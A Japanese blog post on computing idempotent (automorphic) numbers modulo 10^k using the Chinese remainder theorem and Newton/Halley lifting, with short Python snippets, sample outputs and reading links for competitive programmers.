与えられた $k$ に対して $x^2 \equiv x \pmod{10^k}$ を満たす $0\le x\lt 10^k$ について考えます。 $10^k = 2^k\cdot 5^k$ であり、$2$ と $5$ が素数であることから $$ \begin{cases} x\equiv 0 \vee x\equiv 1 \pmod{2^k}, \\ x\equiv 0 \vee x\equiv 1 \pmod{5^k} \end{cases} $$ です。

中国剰余定理を踏まえつつ各ケースについて考えていきます。

$$ \begin{cases} x\equiv 0 \pmod{2^k}, \\ x\equiv 0 \pmod{5^k} \\ \end{cases} $$ のとき、ある $q\in\N$ が存在して $x = q\cdot 2^k+0$ と書け、$q\cdot 2^k\equiv 0\pmod{5^k}$ です。 $\gcd(2, 5) = 1$ なので $q\equiv 0\pmod{5^k}$ です。よって $q = 0$ や $x = 0$ が従います。

$$ \begin{cases} x\equiv 1 \pmod{2^k}, \\ x\equiv 1 \pmod{5^k} \\ \end{cases} $$ のとき、ある $q\in\N$ が存在して $x = q\cdot 2^k+1$ と書け、$q\cdot 2^k + 1\equiv 1\pmod{5^k}$ です。 同様にして $x = 1$ が従います。

$$ \begin{cases} x\equiv 1 \pmod{2^k}, \\ x\equiv 0 \pmod{5^k} \\ \end{cases} $$ のとき、ある $q\in\N$ が存在して $x = q\cdot 2^k+1$ と書け、$q\cdot 2^k+1\equiv 0\pmod{5^k}$ です。 $q\equiv (-1)\cdot (2^{-k}) \pmod{5^k}$ より、$x = (-2^{-k}\bmod{5^k})\cdot 2^k + 1$ となります。

$$ \begin{cases} x\equiv 0 \pmod{2^k}, \\ x\equiv 1 \pmod{5^k} \\ \end{cases} $$ のとき、同様にして $x = (-5^{-k}\bmod{2^k})\cdot 5^k + 1$ となります。

>>> (lambda k: (-pow(2, -k, 5**k) * 2**k + 1) % 10**k)(64)
9580863811000557423423230896109004106619977392256259918212890625

>>> (lambda k: (-pow(2, -k, 5**k) * 2**k + 1) % 10**k)(64)**2 % 10**64
9580863811000557423423230896109004106619977392256259918212890625

ということで、競プロ界隈でも比較的有名そうな知識（主観）で簡単に求まってしまいました。 元々は、比較的有名ではなさそう（主観）な別の方法で求めるのを記事にしようと思っていたのですが、そっかーという感じになりました。

方法②

元々考えていた方法はこちらです。

Newton 法というのがあります。大学や基本情報技術者試験などで学びがちな Newton 法は数値計算の文脈のものが多く、たとえば $\sqrt2$ の近似値を求めるようなときに使いがちな気がします。 それに限らず、一般の環においての定理があります。

環 $R$ を考えます。$R$ 係数で不定元を $y$ とする多項式全体からなる集合を $R[y]$ と書きます。 $m\in R$ かつ $\varphi\in R[y]$ とし、$g\in R$ が $\varphi(g)\equiv 0\pmod{m}$ が成り立ち、さらに $\varphi'(g)^{-1}\bmod m$ が存在するとします*1。 このとき、 $$ h = \left(g - \varphi(g)\cdot \varphi'(g)^{-1}\right) \bmod {m^2} $$ で定義すると、$\varphi(h) \equiv 0 \pmod{m^2}$ かつ $h \equiv g \pmod{m}$ が成り立ち、さらに $\varphi'(h)^{-1}\bmod m^2$ が存在します。

証明については Modern Computer Algebra^[1] の Lemma 9.21 などを見ましょう。

ということで、$\varphi = y^2 - y \in \Z[y]$ で定義して $\varphi(g) \equiv 0\pmod{10^k}$ なる $g$ を求めたいということになります。 $\varphi(g) \equiv 0\pmod{10^j}$ なる $g$ が求められているとき、 $$ \begin{aligned} h &\equiv g - (g^2 - g)\cdot (2g-1)^{-1} \\ &\equiv (g\cdot(2g-1) - (g^2 - g) )\cdot (2g-1)^{-1} \\ &\equiv (2g^2-g-g^2+g)\cdot (2g-1)^{-1} \\ &\equiv g^2 \cdot (2g-1)^{-1} \pmod{10^{2j}} \end{aligned} $$ として $\varphi(h)\equiv 0\pmod{10^{2j}}$ なる $h$ が求められます。

def newton(g, m, k):
    for _ in range(k):
        m *= m
        g = g**2 * pow(2 * g - 1, -1, m) % m
    return g

$\varphi(5)\equiv 0 \pmod{10}$ は既知として、たとえば newton(5, 10, 6) を呼び出すと、g が

25
625
12890625
6259918212890625
4106619977392256259918212890625
9580863811000557423423230896109004106619977392256259918212890625

といったように収束していく様子が見られます。

他にも Halley 法というのがあり、こちらは三次収束です。

def halley(g, m, k):
    for _ in range(k):
        m *= m * m
        g = g**3 * pow(3 * g**2 - 3 * g + 1, -1, m) % m
    return g

625
212890625
619977392256259918212890625
938509890062166509580863811000557423423230896109004106619977392256259918212890625

反復回数としては Halley 法の方が $\log_3(2)\approx 0.63$ 倍だけ得していますが、反復ごとの計算は Newton 法の方が単純がちなので、Newton 法の方が結局は得していそうな気がします*2。

もちろん、$x^3 \equiv x \pmod{10^k}$ のような式を満たす $x$ についても（どちらの方法でも）求められます。

$$ \begin{aligned} &\phantom{{}={}} 6259918212890624^3 \\ &= 245304761004039189166825963184256259918212890624 \\ &\equiv 6259918212890624 \pmod{10^{16}}. \end{aligned} $$

おまけ

“Newton’s method Codeforces” でググったところ下記の記事が上位に出てきました。競プロ界隈で Newton 法と言えば数値計算ではなく FPS の文脈がちで、偏ってるな〜と面白くなりました。

• CDQ convolution (online FFT) generalization with Newton method by adamant
• Operations on Formal Power Series by rng_58
• A problem collection of ODE and differential technique by jqdai0815

そういえば、自分も過去になんかを書いていたらしいです。記憶から抜けていました。

rsk0315.hatenablog.com

経緯

今回は YouTube の動画に触発されたシリーズです。

www.youtube.com

他の回としては下記のようなものがあります。

rsk0315.hatenablog.com

別にわざわざ書く必要もないか？みたいな気持ちになりながらも一応書きました。

「A というトピックについて考えましょう」
「これは界隈にはあまり浸透していない B 法で求められます、おもしろーい」
「あれ、界隈に浸透している C 法で求められますね、つまんなーい」
みたいになり投げ出してしまいました、もったいなーい

— えびちゃん🍑🍝🦃 (@rsk0315_h4x) 2025年12月5日

ところで、CRT と言えば最近は No.3396 ChRisTmas memory がアツいらしいです？

参考文献

[1]: Gathen, Joachim von zur, and Jürgen Gerhard. Modern Computer Algebra. 3rd ed. Cambridge: Cambridge University Press, 2013.

あとがき

前回の記事から間隔が空いてしまいました。いろいろなコンテンツに手を出していて、あまり記事を書こうという感じになっていませんでした。

CTF で crypto とかをしていると word size に収まらないような数が当然のように出てくるので、競プロ界隈とは違った感じがするな〜という気持ちになります。 Daily AlpacaHack などが最近の初心者向けコンテンツとしてはよさそうなのかな〜と思ったりしています。

alpacahack.com

それはそれとして、word size の高速素因数分解とかも興味はありますよね。SQUFOF のお勉強もしなきゃなと思っています。

おなかがすきました。気持ちや頭の中が無のときにあとがきを書くと短めになることがわかりました。

おわり

おわりましょう。